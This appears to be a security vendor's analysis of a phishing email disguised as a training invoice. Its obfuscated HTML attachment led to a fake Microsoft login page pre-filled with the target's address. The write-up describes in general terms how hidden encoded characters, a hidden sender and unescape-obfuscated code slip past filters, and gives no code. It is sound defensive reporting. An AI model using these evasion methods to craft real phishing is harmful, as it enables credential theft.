In this attack, a company executive received an email indicating it included an invoice for training. The email was configured to hide the sender’s email address and the sending display name was set to “I N VOICE-176152,” which included hidden encoded characters. An analysis of the email headers indicated that the email was sent using a compromised external domain.

Status Bar Dots
Training Invoice Phishing Email

Attached to the email was an HTML file matching the invoice name referenced in the email subject. The source code of the HTML attachment was obfuscated with a Javascript unescape function. Had the recipient opened the file, a new browser window would have appeared that initially indicated they were being directed “to your organization’s sign-in page.” After a few seconds, the page would have reloaded to display a fake Microsoft login page pre-filled with the recipient’s email address.

Status Bar Dots
Training Invoice Phishing Page 1
Status Bar Dots
Training Invoice Phishing Page 2

How Does This Attack Bypass Email Defenses?

This attack contained hidden encoded characters, which prevents threat detection tools relying on identifying known malicious text strings from identifying the email as a threat. Because the sender’s email address was hidden, it wouldn’t have been able to compare it to known malicious accounts. Because the files associated with this attack contained source code that had been obfuscated, a basic scan of the file to identify malicious artifacts, such as URLs, could not be performed.

How Can This Attack Be Detected?

HTML attachments are commonly used to deliver phishing payloads without having to include the malicious content in the email itself. The use of obfuscated source code is a common tactic in phishing attacks. Additionally, an in-depth analysis of files, rather than simply scanning raw source code, could result in the identification of malicious artifacts. The absence of a sending email address is indicative of behavior from a malicious source. A holistic detection system that is able to extract and analyze URLs from email attachments is required to assess the intent of any links, alongside other signals acquired through content analysis, to determine whether the email is malicious.

What are the Risks of This Attack?

If an employee entered credentials into the phishing page, attackers would have full access to their email account, which they can then use to look for sensitive information or as a launch point for other attacks on the employee’s coworkers, customers, or vendors. 

Analysis Overview




Credential Theft


Hidden Sender Address
Obfuscated Email Content
File Source Code Obfuscation


Fake Invoice

Impersonated Party

External Party - Other

See How Abnormal Stops Emerging Attacks

See a Demo